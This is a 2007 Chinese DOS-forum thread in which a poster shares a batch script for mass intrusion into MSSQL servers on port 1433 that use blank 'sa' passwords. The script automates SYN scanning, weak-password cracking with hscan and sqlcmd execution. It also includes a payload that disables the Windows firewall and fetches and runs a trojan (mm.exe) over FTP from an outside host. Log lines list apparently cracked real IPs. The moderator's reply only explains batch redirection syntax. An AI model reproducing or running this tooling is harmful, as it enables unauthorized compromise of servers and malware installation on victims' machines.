中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名：www.cn-dos.net  论坛域名：www.cn-dos.net/forum
DOS，代表着自由开放与发展，我们努力起来，学习FreeDOS和Linux的自由开放与GNU精神，共同创造和发展美好的自由与GNU GPL世界吧！

作者: 标题: 1433入侵批处理的思路 上一主题 | 下一主题 91544466 新手上路 积分 4 发帖 1 注册 2007-9-15 状态 离线 『楼 主』:  1433入侵批处理的思路 写在前面的话：最近砍1433批量入侵蛮火的，都是利用弱口令。所以就想自己写一个自己的工具，当然需要大家的指点，毕竟我才初出网络。 制作思路： 1.s扫描器开扫1433端口+整理IP段 2.1433弱口令扫描+整理IP段 3.漏洞利用    -------------这是本人现在遇到的关键问题，其实以前写好了，测试成功率满高。但是现在弄丢   &&&&&代码重写以后，自动传马总是出错。 备注：HSCAN进行的扫描 扫描结果在LOG文件夹下产生一个hscan.log的文本，文本如下： 59.39.7.11@mssqlscan#Cracked account:  sa/[null] 59.37.36.11@mssqlscan#Cracked account:  sa/[null] 1433.bat代码如下：请阅过的朋友指点 @echo off color 02                      echo                               QQ：9154446  二郎神 title 安全焦点 Xfocus.Net echo=================================== set /p startip=请输入你要扫描的开始IP: set /p endip=请输入你要扫描的结束IP: set /p max=请输入扫描的线程: echo================================== S syn %startip% %endip% 1433 %max% /save for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ip.txt hscan -f ip.txt -mssql del result.txt del s1.txt del s2.txt del ip.txt cd log for /f "tokens=1 delims=@" %%i in (hscan.log) do echo %%i >>ip2.txt for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat dir /b /s *.bat >bat.txt for /f %%i in (bat.txt) do start %%i del ip2.txt del *.bat del bat.txt del hscan.log 以上为完整代码，关键在这一行 for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat 因为1433利用工具hscan的利用格式为sqlcmd ip user pass 我想要的结果就是%%i.bat内容为 sqlcmd ip "sa" "" < sa.txt 测试以下代码可行， for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat 但是我是为什么每次运行的时候他在CMD下都变成了 sqlcmd ip "sa" ""   0<ca.txt ca.txt是ftp传马用到的文本，如下： echo ftp www.ftp.com >ftp.txt echo user >>ftp.txt echo pass >>ftp.txt echo binary >>ftp.txt echo get mm.exe >>ftp.txt echo bye >>ftp.txt net stop sharedaccess ftp -s:ftp.txt mm.exe mm.exe exit exit 大家看看 以上的代码 有什么意见给我发消息，MY QQ:9154446 +我注明来自DOS联盟论坛。 工具做好了发给大家测试： 工具更新在我的BOLG  love9154446.blog.163.com [ Last edited by 91544466 on 2007-9-16 at 12:33 PM ] 2007-9-16 10:33 lxmxn 版主 积分 11386 发帖 4938 注册 2006-7-23 状态 离线 『第 2 楼』:     Quote: 但是我是为什么每次运行的时候他在CMD下都变成了 sqlcmd ip "sa" ""   0<ca.txt < 前面的0是指的0号句柄，代表键盘输入，在批处理中可以省略书写。但是在执行批处理的时候，实际的命令应该是“sqlcmd ip "sa" ""   0<ca.txt”，所以cmd会这样显示。 试试这样的批处理： echo something > file 执行的时候会在命令行显示   Quote: echo something 1> file 可以发现这里的1号句柄(标准输出StdOut)也是可以省略的。 2007-9-16 21:29

可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题

论坛跳转: 站务区  > 站务公告 & 版主讨论  > 意见反馈 & 网友交流 DOS讨论区  > DOS学习入门 & 精彩文章 （教学室）  > DOS疑难解答 & 问题讨论 （解答室）  > DOS启动盘 & LOGO技术 （启动盘室）  > DOS批处理 & 脚本技术（批处理室）  > DOS媒体世界 & 网络技术 （多媒体室）  > DOS汉化世界 & 中文系统 （中文化室）  > DOS开发编程 & 发展交流 （开发室）  > DOS软件下载 & 游戏分享 （下载室） 其它讨论区  > GRUB4DOS、SYSLINUX及其它启动管理软件讨论专区  > 其它操作系统综合讨论区  > WinPE、PowerShell及其它命令行系统专区  > 贴图灌水、文学娱乐专区 服务区  > 网络日志（Blog）  > 论坛回收站      > 链接失效，待修正